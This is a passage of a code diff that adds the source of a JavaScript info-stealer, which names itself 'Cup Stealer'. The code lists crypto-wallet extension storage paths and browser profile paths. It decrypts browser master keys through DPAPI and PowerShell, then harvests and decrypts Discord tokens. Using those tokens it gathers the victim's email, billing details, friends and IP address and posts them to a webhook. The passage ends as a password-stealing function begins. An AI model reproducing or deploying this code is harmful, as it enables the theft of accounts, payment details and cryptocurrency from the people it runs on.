+ '\\Local Extension Settings\\epapihdplajcdnnkdeiahlgigofloibg'
530
+ _0x4ae424.Sui = '\\Local Extension Settings\\opcgpfmipidbgpenhmajoajpbobppdil'
531
+ _0x4ae424.SuietSui =
532
+ '\\Local Extension Settings\\khpkpbbcccdmmclmpigdgddabeilkdpd'
533
+ _0x4ae424.Braavos =
534
+ '\\Local Extension Settings\\jnlgamecbpmbajjfhmmmlhejkemejdma'
535
+ _0x4ae424.FewchaMove =
536
+ '\\Local Extension Settings\\ebfidpplhabeedpnhjnobghokpiioolj'
537
+ _0x4ae424.EthosSui =
538
+ '\\Local Extension Settings\\mcbigmjiafegjnnogedioegffbooigli'
539
+ _0x4ae424.ArgentX =
540
+ '\\Local Extension Settings\\dlcobpjiigpikoobohmabehhmhfoodbb'
541
+ _0x4ae424.NiftyWallet =
542
+ '\\Local Extension Settings\\jbdaocneiiinmjbjlgalhcelgbejmnid'
543
+ _0x4ae424.BraveWallet =
544
+ '\\Local Extension Settings\\odbfpeeihdkbihmopkbjmoonfanlbfcl'
545
+ _0x4ae424.EqualWallet =
546
+ '\\Local Extension Settings\\blnieiiffboillknjnepogjhkgnoapac'
547
+ _0x4ae424.BitAppWallet =
548
+ '\\Local Extension Settings\\fihkakfobkmkjojpchpfgcmhfjnmnfpi'
549
+ _0x4ae424.iWallet =
550
+ '\\Local Extension Settings\\kncchdigobghenbbaddojjnnaogfppfj'
551
+ _0x4ae424.AtomicWallet =
552
+ '\\Local Extension Settings\\fhilaheimglignddkjgofkcbgekhenbh'
553
+ _0x4ae424.MewCx = '\\Local Extension Settings\\nlbmnnijcnlegkjjpcfjclmcfggfefdm'
554
+ _0x4ae424.GuildWallet =
555
+ '\\Local Extension Settings\\nanjmdknhkinifnkgdcggcfnhdaammmj'
556
+ _0x4ae424.SaturnWallet =
557
+ '\\Local Extension Settings\\nkddgncdjgjfcddamfgcmfnlhccnimig'
558
+ _0x4ae424.HarmonyWallet =
559
+ '\\Local Extension Settings\\fnnegphlobjdpkhecapkijjdkgcjhkib'
560
+ _0x4ae424.PaliWallet =
561
+ '\\Local Extension Settings\\mgffkfbidihjpoaomajlbgchddlicgpn'
562
+ _0x4ae424.BoltX = '\\Local Extension Settings\\aodkkagnadcbobfpggfnjeongemjbjca'
563
+ _0x4ae424.LiqualityWallet =
564
+ '\\Local Extension Settings\\kpfopkelmapcoipemfendmdcghnegimn'
565
+ _0x4ae424.MaiarDeFiWallet =
566
+ '\\Local Extension Settings\\dngmlblcodfobpdpecaadgfbcggfjfnm'
567
+ _0x4ae424.TempleWallet =
568
+ '\\Local Extension Settings\\ookjlbkiijinhpmnjffcofjonbfbgaoc'
569
+ _0x4ae424.Metamask_E =
570
+ '\\Local Extension Settings\\ejbalbakoplchlghecdalmeeeajnimhm'
571
+ _0x4ae424.Ronin_E =
572
+ '\\Local Extension Settings\\kjmoohlgokccodicjjfebfomlbljgfhk'
573
+ _0x4ae424.Yoroi_E =
574
+ '\\Local Extension Settings\\akoiaibnepcedcplijmiamnaigbepmcb'
575
+ _0x4ae424.Authenticator_E =
576
+ '\\Sync Extension Settings\\ocglkepbibnalbgmbachknglpdipeoio'
577
+ _0x4ae424.MetaMask_O =
578
+ '\\Local Extension Settings\\djclckkglechooblngghdinmeemkbgci'
579
+
580
+ const extension = _0x4ae424,
581
+ browserPath = [
582
+ [
583
+ user.local + '\\Google\\Chrome\\User Data\\Default\\',
584
+ 'Default',
585
+ user.local + '\\Google\\Chrome\\User Data\\',
586
+ ],
587
+ [
588
+ user.local + '\\Google\\Chrome\\User Data\\Profile 1\\',
589
+ 'Profile_1',
590
+ user.local + '\\Google\\Chrome\\User Data\\',
591
+ ],
592
+ [
593
+ user.local + '\\Google\\Chrome\\User Data\\Profile 2\\',
594
+ 'Profile_2',
595
+ user.local + '\\Google\\Chrome\\User Data\\',
596
+ ],
597
+ [
598
+ user.local + '\\Google\\Chrome\\User Data\\Profile 3\\',
599
+ 'Profile_3',
600
+ user.local + '\\Google\\Chrome\\User Data\\',
601
+ ],
602
+ [
603
+ user.local + '\\Google\\Chrome\\User Data\\Profile 4\\',
604
+ 'Profile_4',
605
+ user.local + '\\Google\\Chrome\\User Data\\',
606
+ ],
607
+ [
608
+ user.local + '\\Google\\Chrome\\User Data\\Profile 5\\',
609
+ 'Profile_5',
610
+ user.local + '\\Google\\Chrome\\User Data\\',
611
+ ],
612
+ [
613
+ user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\',
614
+ 'Default',
615
+ user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\',
616
+ ],
617
+ [
618
+ user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 1\\',
619
+ 'Profile_1',
620
+ user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\',
621
+ ],
622
+ [
623
+ user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 2\\',
624
+ 'Profile_2',
625
+ user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\',
626
+ ],
627
+ [
628
+ user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 3\\',
629
+ 'Profile_3',
630
+ user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\',
631
+ ],
632
+ [
633
+ user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 4\\',
634
+ 'Profile_4',
635
+ user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\',
636
+ ],
637
+ [
638
+ user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\Profile 5\\',
639
+ 'Profile_5',
640
+ user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\',
641
+ ],
642
+ [
643
+ user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\Guest Profile\\',
644
+ 'Guest Profile',
645
+ user.local + '\\BraveSoftware\\Brave-Browser\\User Data\\',
646
+ ],
647
+ [
648
+ user.local + '\\Yandex\\YandexBrowser\\User Data\\Default\\',
649
+ 'Default',
650
+ user.local + '\\Yandex\\YandexBrowser\\User Data\\',
651
+ ],
652
+ [
653
+ user.local + '\\Yandex\\YandexBrowser\\User Data\\Profile 1\\',
654
+ 'Profile_1',
655
+ user.local + '\\Yandex\\YandexBrowser\\User Data\\',
656
+ ],
657
+ [
658
+ user.local + '\\Yandex\\YandexBrowser\\User Data\\Profile 2\\',
659
+ 'Profile_2',
660
+ user.local + '\\Yandex\\YandexBrowser\\User Data\\',
661
+ ],
662
+ [
663
+ user.local + '\\Yandex\\YandexBrowser\\User Data\\Profile 3\\',
664
+ 'Profile_3',
665
+ user.local + '\\Yandex\\YandexBrowser\\User Data\\',
666
+ ],
667
+ [
668
+ user.local + '\\Yandex\\YandexBrowser\\User Data\\Profile 4\\',
669
+ 'Profile_4',
670
+ user.local + '\\Yandex\\YandexBrowser\\User Data\\',
671
+ ],
672
+ [
673
+ user.local + '\\Yandex\\YandexBrowser\\User Data\\Profile 5\\',
674
+ 'Profile_5',
675
+ user.local + '\\Yandex\\YandexBrowser\\User Data\\',
676
+ ],
677
+ [
678
+ user.local + '\\Yandex\\YandexBrowser\\User Data\\Guest Profile\\',
679
+ 'Guest Profile',
680
+ user.local + '\\Yandex\\YandexBrowser\\User Data\\',
681
+ ],
682
+ [
683
+ user.local + '\\Microsoft\\Edge\\User Data\\Default\\',
684
+ 'Default',
685
+ user.local + '\\Microsoft\\Edge\\User Data\\',
686
+ ],
687
+ [
688
+ user.local + '\\Microsoft\\Edge\\User Data\\Profile 1\\',
689
+ 'Profile_1',
690
+ user.local + '\\Microsoft\\Edge\\User Data\\',
691
+ ],
692
+ [
693
+ user.local + '\\Microsoft\\Edge\\User Data\\Profile 2\\',
694
+ 'Profile_2',
695
+ user.local + '\\Microsoft\\Edge\\User Data\\',
696
+ ],
697
+ [
698
+ user.local + '\\Microsoft\\Edge\\User Data\\Profile 3\\',
699
+ 'Profile_3',
700
+ user.local + '\\Microsoft\\Edge\\User Data\\',
701
+ ],
702
+ [
703
+ user.local + '\\Microsoft\\Edge\\User Data\\Profile 4\\',
704
+ 'Profile_4',
705
+ user.local + '\\Microsoft\\Edge\\User Data\\',
706
+ ],
707
+ [
708
+ user.local + '\\Microsoft\\Edge\\User Data\\Profile 5\\',
709
+ 'Profile_5',
710
+ user.local + '\\Microsoft\\Edge\\User Data\\',
711
+ ],
712
+ [
713
+ user.local + '\\Microsoft\\Edge\\User Data\\Guest Profile\\',
714
+ 'Guest Profile',
715
+ user.local + '\\Microsoft\\Edge\\User Data\\',
716
+ ],
717
+ [
718
+ user.roaming + '\\Opera Software\\Opera Neon\\User Data\\Default\\',
719
+ 'Default',
720
+ user.roaming + '\\Opera Software\\Opera Neon\\User Data\\',
721
+ ],
722
+ [
723
+ user.roaming + '\\Opera Software\\Opera Stable\\',
724
+ 'Default',
725
+ user.roaming + '\\Opera Software\\Opera Stable\\',
726
+ ],
727
+ [
728
+ user.roaming + '\\Opera Software\\Opera GX Stable\\',
729
+ 'Default',
730
+ user.roaming + '\\Opera Software\\Opera GX Stable\\',
731
+ ],
732
+ ],
733
+ randomPath = `${user.fileLoc}\\cup_lol`;
734
+ try {
735
+ fs.mkdirSync(randomPath, 484);
736
+ }catch {
737
+ console.log("Folder already exist");
738
+ }
739
+
740
+ async function getEncrypted() {
741
+ for (let _0x4c3514 = 0; _0x4c3514 < browserPath.length; _0x4c3514++) {
742
+ if (!fs.existsSync('' + browserPath[_0x4c3514][0])) {
743
+ continue
744
+ }
745
+ try {
746
+ let _0x276965 = Buffer.from(
747
+ JSON.parse(fs.readFileSync(browserPath[_0x4c3514][2] + 'Local State'))
748
+ .os_crypt.encrypted_key,
749
+ 'base64'
750
+ ).slice(5)
751
+ const _0x4ff4c6 = Array.from(_0x276965),
752
+ _0x4860ac = execSync(
753
+ 'powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(' +
754
+ _0x4ff4c6 +
755
+ "), $null, 'CurrentUser')"
756
+ )
757
+ .toString()
758
+ .split('\r\n'),
759
+ _0x4a5920 = _0x4860ac.filter((_0x29ebb3) => _0x29ebb3 != ''),
760
+ _0x2ed7ba = Buffer.from(_0x4a5920)
761
+ browserPath[_0x4c3514].push(_0x2ed7ba)
762
+ } catch (_0x32406b) {}
763
+ }
764
+ }
765
+
766
+ function addFolder(folderPath) {
767
+ const folderFullPath = path.join(randomPath, folderPath);
768
+ if (!fs.existsSync(folderFullPath)) {
769
+ try {
770
+ fs.mkdirSync(folderFullPath, { recursive: true });
771
+ } catch (error) {}
772
+ }
773
+ }
774
+
775
+
776
+ async function getZipp(sourcePath, zipFilePath) {
777
+ try {
778
+ const zip = new AdmZip();
779
+ zip.addLocalFolder(sourcePath);
780
+ zip.writeZip('' + zipFilePath);
781
+ } catch (error) {
782
+
783
+ }
784
+ }
785
+
786
+ function getZip(sourcePath, zipFilePath) {
787
+ try {
788
+ const zip = new AdmZip();
789
+ zip.addLocalFolder(sourcePath);
790
+ zip.writeZip('' + zipFilePath);
791
+ } catch (error) {}
792
+ }
793
+
794
+ function copyFolder(sourcePath, destinationPath) {
795
+ const isDestinationExists = fs.existsSync(destinationPath);
796
+ const destinationStats = isDestinationExists && fs.statSync(destinationPath);
797
+ const isDestinationDirectory = isDestinationExists && destinationStats.isDirectory();
798
+
799
+ if (isDestinationDirectory) {
800
+ addFolder(sourcePath);
801
+
802
+ fs.readdirSync(destinationPath).forEach((file) => {
803
+ const sourceFile = path.join(sourcePath, file);
804
+ const destinationFile = path.join(destinationPath, file);
805
+ copyFolder(sourceFile, destinationFile);
806
+ });
807
+ } else {
808
+ fs.copyFileSync(destinationPath, path.join(randomPath, sourcePath));
809
+ }
810
+ }
811
+
812
+ const decryptKey = (localState) => {
813
+ const encryptedKey = JSON.parse(fs.readFileSync(localState, 'utf8')).os_crypt.encrypted_key;
814
+ const encrypted = Buffer.from(encryptedKey, 'base64').slice(5);
815
+ return Dpapi.unprotectData(Buffer.from(encrypted, 'utf8'), null, 'CurrentUser');
816
+ };
817
+
818
+ function findTokenn(path) {
819
+ path += 'Local Storage\\leveldb';
820
+ let tokens = [];
821
+ try {
822
+ fs.readdirSync(path)
823
+ .map(file => {
824
+ (file.endsWith('.log') || file.endsWith('.ldb')) && fs.readFileSync(path + '\\' + file, 'utf8')
825
+ .split(/\r?\n/)
826
+ .forEach(line => {
827
+ const patterns = [new RegExp(/mfa\.[\w-]{84}/g), new RegExp(/[\w-][\w-][\w-]{24}\.[\w-]{6}\.[\w-]{26,110}/gm), new RegExp(/[\w-]{24}\.[\w-]{6}\.[\w-]{38}/g)];
828
+ for (const pattern of patterns) {
829
+ const foundTokens = line.match(pattern);
830
+ if (foundTokens) foundTokens.forEach(token => tokens.push(token));
831
+ }
832
+ });
833
+ });
834
+ } catch (e) {}
835
+ return tokens;
836
+ }
837
+
838
+ async function createZipp(sourcePath, zipPath) {
839
+ return new Promise((resolve, reject) => {
840
+ const zip = new AdmZip();
841
+ zip.addLocalFolder(sourcePath);
842
+ zip.writeZip(zipPath, (err) => {
843
+ if (err) {
844
+ reject(err);
845
+ } else {
846
+ console.log('ZIP arşivi oluşturuldu: ' + zipPath);
847
+
848
+ resolve();
849
+ }
850
+ });
851
+ });
852
+ }
853
+
854
+ async function getZippp() {
855
+ getZipp(randomPath, randomPath + '.zip')
856
+
857
+ const filePath = './' + 'cup' + '.zip';
858
+
859
+ const randomString = crypto.randomBytes(16).toString('hex');
860
+
861
+ }
862
+
863
+ const tokens = [];
864
+
865
+ async function findToken(basePath) {
866
+ const leveldbPath = path.join(basePath, 'Local Storage', 'leveldb');
867
+ if (!basePath.includes('discord')) {
868
+ try {
869
+ fs.readdirSync(leveldbPath).forEach(file => {
870
+ if (file.endsWith('.log') || file.endsWith('.ldb')) {
871
+ const filePath = path.join(leveldbPath, file);
872
+ fs.readFileSync(filePath, 'utf8')
873
+ .split(/\r?\n/)
874
+ .forEach(line => {
875
+ const patterns = [
876
+ /mfa\.[\w-]{84}/g,
877
+ /[\w-]{24}\.[\w-]{6}\.[\w-]{26,110}/gm,
878
+ /[\w-]{24}\.[\w-]{6}\.[\w-]{38}/g
879
+ ];
880
+ patterns.forEach(pattern => {
881
+ const foundTokens = line.match(pattern);
882
+ if (foundTokens) {
883
+ foundTokens.forEach(token => {
884
+ if (!tokens.includes(token)) tokens.push(token);
885
+ });
886
+ }
887
+ });
888
+ });
889
+ }
890
+ });
891
+ } catch (e) {
892
+ }
893
+ return;
894
+ } else {
895
+ const localStatePath = path.join(basePath, 'Local State');
896
+ if (fs.existsSync(localStatePath)) {
897
+ try {
898
+ const tokenRegex = /dQw4w9WgXcQ:[^.*['(.*)'\].*$][^"]*/gi;
899
+
900
+ fs.readdirSync(leveldbPath).forEach(file => {
901
+ if (file.endsWith('.log') || file.endsWith('.ldb')) {
902
+ const filePath = path.join(leveldbPath, file);
903
+ const fileContent = fs.readFileSync(filePath, 'utf8');
904
+ const lines = fileContent.split(/\r?\n/);
905
+ const key = decryptKey(localStatePath);
906
+
907
+ lines.forEach(line => {
908
+ const foundTokens = line.match(tokenRegex);
909
+ if (foundTokens) {
910
+ foundTokens.forEach(token => {
911
+ let decrypted;
912
+ const encryptedValue = Buffer.from(token.split(':')[1], 'base64');
913
+ const start = encryptedValue.slice(3, 15);
914
+ const middle = encryptedValue.slice(15, encryptedValue.length - 16);
915
+ const end = encryptedValue.slice(encryptedValue.length - 16, encryptedValue.length);
916
+ const decipher = crypto.createDecipheriv('aes-256-gcm', key, start);
917
+ decipher.setAuthTag(end);
918
+ decrypted = decipher.update(middle, 'base64', 'utf8') + decipher.final('utf8');
919
+
920
+ if (!tokens.includes(decrypted)) tokens.push(decrypted);
921
+ });
922
+ }
923
+ });
924
+ }
925
+ });
926
+ } catch (e) {
927
+ console.error("Error processing files:", e);
928
+ }
929
+ return;
930
+ }
931
+ }
932
+ }
933
+
934
+
935
+ async function stealTokens() {
936
+ const sentTokens = new Set();
937
+
938
+ for (let path of paths) {
939
+ await findToken(path);
940
+ }
941
+
942
+ for (let token of tokens) {
943
+ // Verifica se o token já foi enviado
944
+ if (sentTokens.has(token)) {
945
+ continue; // Se já foi enviado, ignora esse token
946
+ }
947
+
948
+ try {
949
+ let json;
950
+ await axios.get("https://discord.com/api/v10/users/@me", {
951
+ headers: {
952
+ "Content-Type": "application/json",
953
+ "authorization": token
954
+ }
955
+ }).then(res => { json = res.data}).catch(() => { json = null });
956
+ if (!json) continue;
957
+
958
+ console.log("Definindo variavel de ip");
959
+ var ip = await getIp();
960
+ console.log("Variavel de ip definida");
961
+ var billing = await getBilling(token);
962
+ console.log("Variavel de billing definida");
963
+ var { friendsList, numberOfFriends } = await getRelationships(token);
964
+ console.log("Variavel de getRelationships definida");
965
+
966
+ const randomString = crypto.randomBytes(16).toString('hex');
967
+
968
+ const userInformationEmbed = {
969
+ color: 0x050000,
970
+ author: {
971
+ name: `${json.global_name} | (@${json.username})`,
972
+ icon_url: json.avatar
973
+ ? `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}?size=512`
974
+ : "https://cdn.discordapp.com/icons/1323239039800971305/71e3dd59206f3491fd856fd8f08a4a20.webp?size=1024",
975
+ },
976
+ fields: [
977
+ {
978
+ name: "<:token:1323307210947690506> **Token**",
979
+ value: `\`\`\`${token}\`\`\``
980
+ },
981
+ {
982
+ name: "<:badge:1323334115080143000> **Badges**",
983
+ value: getBadges(json.flags),
984
+ inline: true
985
+ },
986
+ {
987
+ name: "<:nitro:1323307200432832632> **Nitro**",
988
+ value: await getNitro(json.premium_type, json.id, token),
989
+ inline: true
990
+ },
991
+ {
992
+ name: "<:creditcard:1323301159703674991> **Billing**",
993
+ value: billing,
994
+ inline: true
995
+ },
996
+ {
997
+ name: "<:email:1323307188004978790> **Email**",
998
+ value: `\`${json.email}\``,
999
+ inline: true
1000
+ },
1001
+ {
1002
+ name: "<:ip:1323336366872068147> **IP**",
1003
+ value: `\`${ip}\``,
1004
+ inline: true
1005
+ },
1006
+ ],
1007
+ footer: {
1008
+ text: `Cup Stealer | ${process.env.username}`,
1009
+ icon_url: "https://cdn.discordapp.com/icons/1323239039800971305/71e3dd59206f3491fd856fd8f08a4a20.webp?size=1024"
1010
+ },
1011
+ timestamp: new Date()
1012
+ };
1013
+
1014
+ const friendsEmbed = {
1015
+ title: `<:hq:1323334085141205003> HQ Friends | Total Friends: ${numberOfFriends}`,
1016
+ color: 0x050000,
1017
+ description: friendsList,
1018
+ author: {
1019
+ name: `${json.global_name} | (@${json.username})`,
1020
+ icon_url: json.avatar
1021
+ ? `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}?size=512`
1022
+ : "https://cdn.discordapp.com/icons/1323239039800971305/71e3dd59206f3491fd856fd8f08a4a20.webp?size=1024",
1023
+ },
1024
+ footer: {
1025
+ text: `Cup Stealer | ${process.env.username}`,
1026
+ icon_url: json.avatar
1027
+ ? `https://cdn.discordapp.com/avatars/${json.id}/${json.avatar}?size=512`
1028
+ : "https://cdn.discordapp.com/icons/1323239039800971305/71e3dd59206f3491fd856fd8f08a4a20.webp?size=1024",
1029
+ },
1030
+ timestamp: new Date()
1031
+ };
1032
+
1033
+ const data = {
1034
+ embeds: [userInformationEmbed, friendsEmbed]
1035
+ };
1036
+
1037
+ // Envia os dados para o webhook
1038
+ await axios.post(webhook_url, data);
1039
+
1040
+ // Adiciona o token ao conjunto para garantir que ele não seja enviado novamente
1041
+ sentTokens.add(token);
1042
+
1043
+ } catch (error) {
1044
+ console.error(error);
1045
+ }
1046
+ }
1047
+ }
1048
+
1049
+ const badges = {
1050
+ Discord_Employee: {
1051
+ Value: 1,
1052
+ Emoji: "<:Discord_Staff:1223097787332169809>",
1053
+ Rare: true,
1054
+ },
1055
+ Partnered_Server_Owner: {
1056
+ Value: 2,
1057
+ Emoji: "<:53141661f1f34d62af9ce610743947f1:1223412115872677919>",
1058
+ Rare: true,
1059
+ },
1060
+ HypeSquad_Events: {
1061
+ Value: 4,
1062
+ Emoji: "<:HypeSquad_Event:1223097765899534416>",
1063
+ Rare: true,
1064
+ },
1065
+ Bug_Hunter_Level_1: {
1066
+ Value: 8,
1067
+ Emoji: "<:Bug_Hunter:1223097740607885444>",
1068
+ Rare: true,
1069
+ },
1070
+ Early_Supporter: {
1071
+ Value: 512,
1072
+ Emoji: "<:early_supporter:1223097963065380935>",
1073
+ Rare: true,
1074
+ },
1075
+ Bug_Hunter_Level_2: {
1076
+ Value: 16384,
1077
+ Emoji: "<:Bug_Hunter_level2:1223097752737681520>",
1078
+ Rare: true,
1079
+ },
1080
+ Early_Verified_Bot_Developer: {
1081
+ Value: 131072,
1082
+ Emoji: "<:devrico:1223097836707512435>",
1083
+ Rare: true,
1084
+ },
1085
+ House_Bravery: {
1086
+ Value: 64,
1087
+ Emoji: "<:HypeSquad_Bravery:1223097924117074040>",
1088
+ Rare: false,
1089
+ },
1090
+ House_Brilliance: {
1091
+ Value: 128,
1092
+ Emoji: "<:HypeSquad_Brilliance:1223097776993468446>",
1093
+ Rare: false,
1094
+ },
1095
+ House_Balance: {
1096
+ Value: 256,
1097
+ Emoji: "<:HypeSquad_Balance:1223097913081729106>",
1098
+ Rare: false,
1099
+ },
1100
+ Discord_Official_Moderator: {
1101
+ Value: 262144,
1102
+ Emoji: "<:Discord_certified_moderator:1223097798535282758>",
1103
+ Rare: true,
1104
+ }
1105
+ };
1106
+
1107
+ async function getRelationships(token) {
1108
+ var j = await axios.get('https://discord.com/api/v10/users/@me/relationships', {
1109
+ headers: {
1110
+ "Content-Type": "application/json",
1111
+ "authorization": token
1112
+ }
1113
+ }).catch(() => { })
1114
+ if (!j) return `*Account locked xD*`
1115
+ var json = j.data
1116
+ const r = json.filter((user) => {
1117
+ return user.type == 1
1118
+ })
1119
+ var friendsList = '';
1120
+ for (const z of r) {
1121
+ var badges = getRareBadges(z.user.public_flags);
1122
+ var boostEmblem = await getBoostEmblem(z.user.id, token);
1123
+ if (boostEmblem !== "" && parseInt(boostEmblem.substring(boostEmblem.indexOf("lvl") + 3, boostEmblem.indexOf(">", boostEmblem.indexOf("lvl")))) >= 2) {
1124
+ friendsList += `${badges}${boostEmblem} **| ${z.user.username}**\n`;
1125
+ }
1126
+ }
1127
+ if (friendsList == '') friendsList = "*Nothing to see here xD*"
1128
+ const numberOfFriends = r.length;
1129
+ return { friendsList: friendsList, numberOfFriends: numberOfFriends };
1130
+ }
1131
+
1132
+ async function getBoostEmblem(id, token) {
1133
+ try {
1134
+ let info;
1135
+ await axios.get(`https://discord.com/api/v10/users/${id}/profile`, {
1136
+ headers: {
1137
+ "Content-Type": "application/json",
1138
+ "authorization": token
1139
+ }
1140
+ }).then(res => { info = res.data })
1141
+ .catch(() => { })
1142
+ if (!info) return "";
1143
+
1144
+ if (!info.premium_guild_since) return "";
1145
+
1146
+ let boost = ["<:lvl1:1219031125247266887>", "<:lvl2:1219031171942449282>", "<:lvl3:1219031999847858216>", "<:lvl4:1219031250950684763>", "<:lvl5:1219031294176919603>", "<:lvl6:1219031344324022425>", "<:lvl7:1219031400607645816>", "<:lvl8:1219031431280332910>", "<:lvl9:1219031069974724638>"]
1147
+ var i = 0
1148
+
1149
+ let boostPeriods = [2, 3, 6, 9, 12, 15, 18, 24];
1150
+ for (const period of boostPeriods) {
1151
+ let expiryDate = new Date(info.premium_guild_since);
1152
+ expiryDate.setMonth(expiryDate.getMonth() + period);
1153
+ let daysLeft = Math.round((expiryDate - Date.now()) / 86400000);
1154
+ if (daysLeft > 0) {
1155
+ break;
1156
+ } else {
1157
+ i++;
1158
+ }
1159
+ }
1160
+
1161
+ if (i >= 4) {
1162
+ return `<:nitro:1227750272915345589>${boost[i]}`;
1163
+ } else {
1164
+ return "";
1165
+ }
1166
+ } catch {
1167
+ return "";
1168
+ }
1169
+ }
1170
+
1171
+ async function getBilling(token) {
1172
+ let json;
1173
+ await axios.get("https://discord.com/api/v10/users/@me/billing/payment-sources", {
1174
+ headers: {
1175
+ "Content-Type": "application/json",
1176
+ "authorization": token
1177
+ }
1178
+ }).then(res => { json = res.data })
1179
+ .catch(err => { })
1180
+ if (!json) return '\`?\`';
1181
+
1182
+ var bi = '';
1183
+ json.forEach(z => {
1184
+ if (z.type == 2 && z.invalid != !0) {
1185
+ bi += "<:946246524504002610:962747802830655498>";
1186
+ } else if (z.type == 1 && z.invalid != !0) {
1187
+ bi += "<:creditcard:1323301159703674991>";
1188
+ }
1189
+ });
1190
+ if (bi == '') bi = `\`None\``
1191
+ return bi;
1192
+ }
1193
+
1194
+ function getBadges(flags) {
1195
+ var b = '';
1196
+ for (const prop in badges) {
1197
+ let o = badges[prop];
1198
+ if ((flags & o.Value) == o.Value) b += o.Emoji;
1199
+ };
1200
+ if (b == '') return `\`None\``;
1201
+ return `${b}`;
1202
+ }
1203
+
1204
+ function getRareBadges(flags) {
1205
+ var b = '';
1206
+ for (const prop in badges) {
1207
+ let o = badges[prop];
1208
+ if ((flags & o.Value) == o.Value && o.Rare) b += o.Emoji;
1209
+ };
1210
+ return b;
1211
+ }
1212
+
1213
+ async function getNitro(flags, id, token) {
1214
+ switch (flags) {
1215
+ case 1:
1216
+ return "<:nitro:1323307200432832632>";
1217
+ case 2:
1218
+ let info;
1219
+ await axios.get(`https://discord.com/api/v10/users/${id}/profile`, {
1220
+ headers: {
1221
+ "Content-Type": "application/json",
1222
+ "authorization": token
1223
+ }
1224
+ }).then(res => { info = res.data })
1225
+ .catch(() => { })
1226
+ if (!info) return "<:nitro:1323307200432832632>";
1227
+
1228
+ if (!info.premium_guild_since) return "<:nitro:1323307200432832632>";
1229
+
1230
+ let boost = ["<:lvl1:1223097977258774569>", "<:lvl2:1223097987740471306>", "<:lvl3:1223097997634834625>", "<:lvl4:1223098007780589580>", "<:lvl5:1223098018916732939>", "<:lvl6:1223098032954937435>", "<:lvl7:1223098045030207689>", "<:lvl8:1223098057546141716>", "<:lvl9:1223098068417773611>"]
1231
+ var i = 0
1232
+
1233
+ try {
1234
+ let d = new Date(info.premium_guild_since)
1235
+ let boost2month = Math.round((new Date(d.setMonth(d.getMonth() + 2)) - new Date(Date.now())) / 86400000)
1236
+ let d1 = new Date(info.premium_guild_since)
1237
+ let boost3month = Math.round((new Date(d1.setMonth(d1.getMonth() + 3)) - new Date(Date.now())) / 86400000)
1238
+ let d2 = new Date(info.premium_guild_since)
1239
+ let boost6month = Math.round((new Date(d2.setMonth(d2.getMonth() + 6)) - new Date(Date.now())) / 86400000)
1240
+ let d3 = new Date(info.premium_guild_since)
1241
+ let boost9month = Math.round((new Date(d3.setMonth(d3.getMonth() + 9)) - new Date(Date.now())) / 86400000)
1242
+ let d4 = new Date(info.premium_guild_since)
1243
+ let boost12month = Math.round((new Date(d4.setMonth(d4.getMonth() + 12)) - new Date(Date.now())) / 86400000)
1244
+ let d5 = new Date(info.premium_guild_since)
1245
+ let boost15month = Math.round((new Date(d5.setMonth(d5.getMonth() + 15)) - new Date(Date.now())) / 86400000)
1246
+ let d6 = new Date(info.premium_guild_since)
1247
+ let boost18month = Math.round((new Date(d6.setMonth(d6.getMonth() + 18)) - new Date(Date.now())) / 86400000)
1248
+ let d7 = new Date(info.premium_guild_since)
1249
+ let boost24month = Math.round((new Date(d7.setMonth(d7.getMonth() + 24)) - new Date(Date.now())) / 86400000)
1250
+
1251
+ if (boost2month > 0) {
1252
+ i += 0
1253
+ } else {
1254
+ i += 1
1255
+ } if (boost3month > 0) {
1256
+ i += 0
1257
+ } else {
1258
+ i += 1
1259
+ } if (boost6month > 0) {
1260
+ i += 0
1261
+ } else {
1262
+ i += 1
1263
+ } if (boost9month > 0) {
1264
+ i += 0
1265
+ } else {
1266
+ i += 1
1267
+ } if (boost12month > 0) {
1268
+ i += 0
1269
+ } else {
1270
+ i += 1
1271
+ } if (boost15month > 0) {
1272
+ i += 0
1273
+ } else {
1274
+ i += 1
1275
+ } if (boost18month > 0) {
1276
+ i += 0
1277
+ } else {
1278
+ i += 1
1279
+ } if (boost24month > 0) {
1280
+ i += 0
1281
+ } else if (boost24month < 0 || boost24month == 0) {
1282
+ i += 1
1283
+ } else {
1284
+ i = 0
1285
+ }
1286
+ } catch {
1287
+ i += 0
1288
+ }
1289
+ return `<:nitro:1323307200432832632> ${boost[i]}`
1290
+ default:
1291
+ return "\`None\`";
1292
+ };
1293
+ }
1294
+
1295
+ async function getIp() {
1296
+ var ip = await axios.get("https://www.myexternalip.com/raw")
1297
+ return ip.data;
1298
+ }
1299
+
1300
+ async function getEncrypted() {
1301
+ for (let _0x4c3514 = 0; _0x4c3514 < browserPath.length; _0x4c3514++) {
1302
+ if (!fs.existsSync('' + browserPath[_0x4c3514][0])) {
1303
+ continue
1304
+ }
1305
+ try {
1306
+ let _0x276965 = Buffer.from(
1307
+ JSON.parse(fs.readFileSync(browserPath[_0x4c3514][2] + 'Local State'))
1308
+ .os_crypt.encrypted_key,
1309
+ 'base64'
1310
+ ).slice(5)
1311
+ const _0x4ff4c6 = Array.from(_0x276965),
1312
+ _0x4860ac = execSync(
1313
+ 'powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(' +
1314
+ _0x4ff4c6 +
1315
+ "), $null, 'CurrentUser')"
1316
+ )
1317
+ .toString()
1318
+ .split('\r\n'),
1319
+ _0x4a5920 = _0x4860ac.filter((_0x29ebb3) => _0x29ebb3 != ''),
1320
+ _0x2ed7ba = Buffer.from(_0x4a5920)
1321
+ browserPath[_0x4c3514].push(_0x2ed7ba)
1322
+ } catch (_0x32406b) {}
1323
+ }
1324
+ }
1325
+
1326
+ async function getPasswords() {
1327
+ const _0x540754 = [];
1328
+
1329
